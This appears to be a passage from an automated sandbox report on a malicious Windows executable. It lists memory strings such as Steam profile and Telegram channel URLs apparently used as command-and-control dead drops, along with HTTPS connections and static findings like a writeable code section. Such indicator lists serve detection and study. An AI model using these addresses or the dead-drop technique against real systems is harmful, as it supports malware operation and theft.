Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619E
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619G
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619_
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619i
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619stea%
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619tlq
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;a(
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/leg
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/_~
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000000.1785190377.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr	String found in binary or memory: https://t.me/m3wm0w
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1812013102.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m3wm0w3
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m3wm0w7
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m3wm0wT
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m3wm0wc
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr	String found in binary or memory: https://t.me/m3wm0wp1up1Mozilla/5.0
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/y~
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.org/img/t_logo_2x.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49711 version: TLS 1.2

System Summary

PE file has a writeable .text section

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Contains functionality to call native functions

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Code function: 14_2_00401625 NtQueryInformationProcess,NtQueryInformationProcess,

14_2_00401625

Detected potential crypto function

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Code function: 0_2_02830A40	0_2_02830A40
